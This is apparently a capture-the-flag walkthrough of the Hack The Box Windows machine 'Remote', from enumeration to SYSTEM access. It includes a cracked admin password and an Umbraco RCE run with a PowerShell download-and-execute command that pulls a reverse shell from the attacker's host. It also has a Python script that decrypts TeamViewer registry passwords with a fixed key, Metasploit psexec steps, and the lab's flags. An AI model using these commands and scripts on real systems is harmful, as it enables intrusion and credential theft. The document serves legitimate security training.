Hack the Box: Remote
What should I know in order to hack this box ?
Release Date: 21-March-2020
Retire Date: 05 Sep 2020
OS: Windows
Base Points: Easy [20]
Prepared By: MrR3boot
Machine Author(s): mrb3n
What is the specialty of remote?
Remote is an easy Windows machine that features an Umbraco CMS installation.Credentials are found in a world-readable NFS share. Using these, an authenticated UmbracoCMS exploit is leveraged to gain a foothold. A vulnerable TeamViewer version is identified, fromwhich we can gain a password. This password has been reused with the local administrator account. Using psexec with these credentials returns a SYSTEM shell.
What did I learn form this box?
- NFS Enumeration
- CMS Exploitation
- TeamViewer Credential Gathering
- SeImpersonate Privilege Abuse
- Mounted
Enumeration
Nmap
I use nmap to do the work for me 😏
kali@kali:~$ nmap -sC -sV -oA scan 10.10.10.180
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-07 13:36 EDT
Nmap scan report for 10.10.10.180
Host is up (0.27s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open mountd 1-3 (RPC #100005)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
|_clock-skew: 5m48s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-09-07T17:44:13
|_ start_date: N/AService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 259.75 seconds
Things to look for in an Nmap scan
- FTP
- TCP
- SMB
- RPCinfo
- HTTP
Why only them ?
Hmm,I too ask the same question but at the end of the day I find out that they are the only listening ports in that box, So I could find some clues to proceed further.
DirBuster
When you see a open port
80/tcp
I would go for Directory Traversal and check all the urls for clues.I know its a tedious process but believe me or not ,most of the time I find really important suff .
kali@kali:~$ dirb http://10.10.10.180/-----------------
DIRB v2.22
By The Dark Raver
-----------------START_TIME: Mon Sep 3 13:55:00 2020
URL_BASE: http://10.10.10.180/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt-----------------GENERATED WORDS: 4612---- Scanning URL: http://10.10.10.180/ ----
+ http://10.10.10.180/about-us (CODE:200|SIZE:5441)
+ http://10.10.10.180/blog (CODE:200|SIZE:5001)
+ http://10.10.10.180/Blog (CODE:200|SIZE:5001)
+ http://10.10.10.180/contact (CODE:200|SIZE:7880)
+ http://10.10.10.180/Contact (CODE:200|SIZE:7880)
+ http://10.10.10.180/home (CODE:200|SIZE:6703)
+ http://10.10.10.180/Home (CODE:200|SIZE:6703)
+ http://10.10.10.180/install (CODE:302|SIZE:126)
+ http://10.10.10.180/intranet (CODE:200|SIZE:3323)
+ http://10.10.10.180/master (CODE:500|SIZE:3420)
+ http://10.10.10.180/people (CODE:200|SIZE:6739)
+ http://10.10.10.180/People (CODE:200|SIZE:6739)
+ http://10.10.10.180/person (CODE:200|SIZE:2741)
+ http://10.10.10.180/product (CODE:500|SIZE:3420)
+ http://10.10.10.180/products (CODE:200|SIZE:5328)
+ http://10.10.10.180/umbraco (CODE:200|SIZE:5328)
Take away from the DirBuster
Umbraco CMS
I found out three different exploits and none of them worked 😅
FTP
ftp-anon: Anonymous FTP login allowed (FTP code 230)
Let’s login to FTP with the credentials anonymous:anonymous as it is the default one for them
kali@kali:~$ ftp 10.10.10.180
Connected to 10.10.10.180.
220 Microsoft FTP Service
Name (10.10.10.180:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
For now there are not files in the ftp.I couldn't upload any of them too.We can ignore this service for now.
Remote Procedure Call Information
Port 111 is open, let’s enumerate it. It is running rpcbind
service. The nmap scan report clearly shows rpcinfo (Remote Procedure Call Information) and list of ports along with their services. For confirmation and removal of false positive results you can use the command rpcinfo
to reveal the exact running services.
Checking RPCinfo:-
kali@kali:~$ rpcinfo -p 10.10.10.180
program vers proto port service
100000 2 udp 111 portmapper
100000 3 udp 111 portmapper
100000 4 udp 111 portmapper
100000 2 tcp 111 portmapper
100000 3 tcp 111 portmapper
100000 4 tcp 111 portmapper
100003 2 tcp 2049 nfs
100003 3 tcp 2049 nfs
100003 2 udp 2049 nfs
100003 3 udp 2049 nfs
100003 4 tcp 2049 nfs
100005 1 tcp 2049 mountd
100005 2 tcp 2049 mountd
100005 3 tcp 2049 mountd
100005 1 udp 2049 mountd
100005 2 udp 2049 mountd
100005 3 udp 2049 mountd
100021 1 tcp 2049 nlockmgr
100021 2 tcp 2049 nlockmgr
100021 3 tcp 2049 nlockmgr
100021 4 tcp 2049 nlockmgr
100021 1 udp 2049 nlockmgr
100021 2 udp 2049 nlockmgr
100021 3 udp 2049 nlockmgr
100021 4 udp 2049 nlockmgr
100024 1 tcp 2049 status
100024 1 udp 2049 status
hmm,Rpcinfo revealed that nfs
[Network file System] and mounted
services are running. OK that’s interesting
NFS
It took me a day to know about it NFS
To install a tool run
sudo apt-get install nfs-common
So I have look for shared folders and files
kali@kali:~$ sudo showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)
The site_backups folder is accessible to everyone. Let’s mount this folder on our machine.
kali@kali:~$ cd backups
kali@kali:~/Desktop/backups$ strings App_Data/Umbraco.sdf | grep admin
Administratoradmindefaulten-US
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/password/changepassword change
User "admin" <admin@htb.local>192.168.195.1User "admin"
It contains username : admin@htb.local
and password in SHA1 hash
form which is ‘b8be16afba8c314ad33d812f22a04991b90e2aaa
‘. Tried to search the hash online on some public databases and luckily got its password on crackstation.net
which is baconandcheese
. So the login credential is admin@htb.local : baconandcheese
.
FOOTHOLD
We can login to Umbraco CMS with the admin@htb.local / baconandcheese credentials.Clicking the Help icon in the bottom-left reveals that the version of the CMS is 7.12.4.This version suffers from an authenticated remote code execution vulnerability, for which a public exploit is available.
https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
Let’s try the github way 😄
As there is an authenticated RCE vulnerability in Umbraco 7.12.4 so searched over GitHub for Umbraco RCE exploit and its usage. Got this link https://github.com/noraj/Umbraco-RCE and downloaded it. Then downloaded PowerShell script Invoke-PowerShellTcp.ps1
from https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
which helps to connect back to the netcat listener on our PC. Replaced the old IP address with my local PC IP address port 5555.
Exploit Execution
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.179 -Port 5555kali@kali:~/Downloads/Umbraco-RCE-master$ python exploit.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180/ -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.179/Invoke-PowerShellTcp.ps1')"
Start Python Http Server
kali@kali:~/Downloads/Umbraco-RCE-master$ sudo python3 -m http.server 80
Start NetCat Listener
kali@kali:~/Downloads/Umbraco-RCE-master$ sudo rlwrap nc -nvlp 5555
listening on [any] 5555 ...
connect to [10.10.14.179] from (UNKNOWN) [10.10.10.180] 49764
Windows PowerShell running as user REMOTE$ on REMOTE
Copyright (C) 2015 Microsoft Corporation. All rights reserved.PS C:\windows\system32\inetsrv>whoami
iis apppool\defaultapppool
PS C:\windows\system32\inetsrv> cd ..
PS C:\windows\system32> cd ..
PS C:\windows> cd ..
PS C:\> lsDirectory: C:\Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/20/2020 1:13 AM ftp_transfer
d----- 2/19/2020 3:11 PM inetpub
d----- 2/19/2020 11:09 PM Microsoft
d----- 9/15/2018 3:19 AM PerfLogs
d-r--- 2/23/2020 2:19 PM Program Files
d----- 2/23/2020 2:19 PM Program Files (x86)
d----- 9/7/2020 12:05 AM site_backups
d-r--- 2/19/2020 3:12 PM Users
d----- 2/20/2020 12:52 AM WindowsPS C:\> cd users
PS C:\users> lsDirectory: C:\usersMode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/19/2020 3:12 PM .NET v2.0
d----- 2/19/2020 3:12 PM .NET v2.0 Classic
d----- 2/19/2020 3:12 PM .NET v4.5
d----- 2/19/2020 3:12 PM .NET v4.5 Classic
d----- 9/7/2020 1:09 AM Administrator
d----- 2/19/2020 3:12 PM Classic .NET AppPool
d-r--- 2/20/2020 2:42 AM PublicPS C:\users> cd Public
PS C:\users\Public> lsDirectory: C:\users\PublicMode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 2/19/2020 3:03 PM Documents
d-r--- 9/15/2018 3:19 AM Downloads
d-r--- 9/15/2018 3:19 AM Music
d-r--- 9/15/2018 3:19 AM Pictures
d-r--- 9/15/2018 3:19 AM Videos
-ar--- 9/7/2020 1:21 AM 34 user.txtPS C:\users\Public> type user.txt
90af1f2df661f235f22caaaa5d6df686
Hmm tats cool and we got the user hurray.
Privilege Escalation
https://whynotsecurity.com/blog/teamviewer/
Having gained a foothold, we can now enumerate the host. Checking for running services reveals the TeamViewer service.
powershell.exe(Get-Command"C:\Program Files(x86)\TeamViewer\Version7\TeamViewer.exe").Version
In vulnerable versions, AES-128-CBCencrypted user passwords are stored in the Windows registry using the known key0602000000a400005253413100040000 and the iv 0100010067244F436E6762F25EA8D704.Let’s background the session and use the Metasploit teamViewer_passwords module to gather the credentials.
C:\> cd HKLM:\software\wow6432node\teamviewer\version7
HKLM:\software\wow6432node\teamviewer\version7> get-itemproperty -path .
StartMenuGroup : TeamViewer 7
InstallationDate : 2020-02-20
InstallationDirectory : C:\Program Files (x86)\TeamViewer\Version7
Always_Online : 1
Security_ActivateDirectIn : 0
Version : 7.0.43148
ClientIC : 301094961
PK : {191, 173, 42, 237...}
SK : {248, 35, 152, 56...}
LastMACUsed : {, 005056B99509}
MIDInitiativeGUID : {514ed376-a4ee-4507-a28b-484604ed0ba0}
MIDVersion : 1
ClientID : 1769137322
CUse : 1
LastUpdateCheck : 1584564540
UsageEnvironmentBackup : 1
SecurityPasswordAES : {255, 155, 28, 115...}
MultiPwdMgmtIDs : {admin}
MultiPwdMgmtPWDs : {357BC4C8F33160682B01AE2D1C987C3FE2BAE09455B94A1919C4CD4984593A77}
Security_PasswordStrength : 3
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\wow6432node\teamviewer\vers
ion7
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\wow6432node\teamviewer
PSChildName : version7
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\RegistryHKLM:\software\wow6432node\teamviewer\version7> (get-itemproperty -path .).SecurityPasswordAES
255
155
28
115
214
107
206
49
172
65
62
174
19
27
70
79
88
47
108
226
209
225
243
218
126
141
55
107
38
57
78
91
After a bit of googling found the script in msfconsole
#!/usr/bin/env python3
from Crypto.Cipher import AES
key = b"\x06\x02\x00\x00\x00\xa4\x00\x00\x52\x53\x41\x31\x00\x04\x00\x00"
iv = b"\x01\x00\x01\x00\x67\x24\x4F\x43\x6E\x67\x62\xF2\x5E\xA8\xD7\x04"
ciphertext = bytes([255, 155, 28, 115, 214, 107, 206, 49, 172, 65, 62, 174,
19, 27, 70, 79, 88, 47, 108, 226, 209, 225, 243, 218,
126, 141, 55, 107, 38, 57, 78, 91])
aes = AES.new(key, AES.MODE_CBC, IV=iv)
password = aes.decrypt(ciphertext).decode("utf-16").rstrip("\x00")
print(f"[+] Found password: {password}")
The script output reveals the password !R3m0te!. The TeamViewer password by itself doesn’t provide us with elevated access.
Using psexec module in msfconsole
use exploit/windows/smb/psexec
set RHOSTS 10.10.10.180
set SMBPass !R3m0te!
set SMBUser administrator
set LHOST tun0
exploit
This is successful, and we can access the root.txt on the administrator Desktop.
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.C:\Windows\system32>cd ..
ccd ..C:\Windows>cd ..
ccd ..
'ccd' is not recognized as an internal or external command,
operable program or batch file.C:\Windows>cd ..
cd ..C:\>cd users
cd usersC:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE23-EB3EDirectory of C:\Users02/19/2020 04:12 PM <DIR> .
02/19/2020 04:12 PM <DIR> ..
02/19/2020 04:12 PM <DIR> .NET v2.0
02/19/2020 04:12 PM <DIR> .NET v2.0 Classic
02/19/2020 04:12 PM <DIR> .NET v4.5
02/19/2020 04:12 PM <DIR> .NET v4.5 Classic
09/07/2020 01:09 AM <DIR> Administrator
02/19/2020 04:12 PM <DIR> Classic .NET AppPool
02/20/2020 03:42 AM <DIR> Public
0 File(s) 0 bytes
9 Dir(s) 19,159,539,712 bytes freeC:\Users>cd Administrator
cd AdministratorC:\Users\Administrator>ls
ls
'ls' is not recognized as an internal or external command,
operable program or batch file.C:\Users\Administrator>C:\Users\Administrator>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE23-EB3EDirectory of C:\Users\Administrator09/07/2020 01:09 AM <DIR> .
09/07/2020 01:09 AM <DIR> ..
02/19/2020 04:03 PM <DIR> 3D Objects
02/19/2020 04:03 PM <DIR> Contacts
02/20/2020 03:41 AM <DIR> Desktop
02/19/2020 05:26 PM <DIR> Documents
02/23/2020 02:22 PM <DIR> Downloads
02/19/2020 04:03 PM <DIR> Favorites
02/19/2020 04:03 PM <DIR> Links
02/19/2020 04:03 PM <DIR> Music
02/19/2020 04:03 PM <DIR> Pictures
02/19/2020 04:03 PM <DIR> Saved Games
02/20/2020 01:45 AM <DIR> Searches
02/19/2020 04:03 PM <DIR> Videos
0 File(s) 0 bytes
14 Dir(s) 19,159,539,712 bytes freeC:\Users\Administrator>cd Desktopcd DesktopC:\Users\Administrator\Desktop>
C:\Users\Administrator\Desktop>type root.txt
type root.txt
ee7491b9fbb1a1b6f6730c4ed1de0e6a
This is how I rooted Remote HTB machine. Learnt a lot after hunting this box. Hope you guys have also learnt some new things from this box walkthrough. Thanks for reading this writeup. For any suggestion and query related to walkthrough, feel free to use the comments section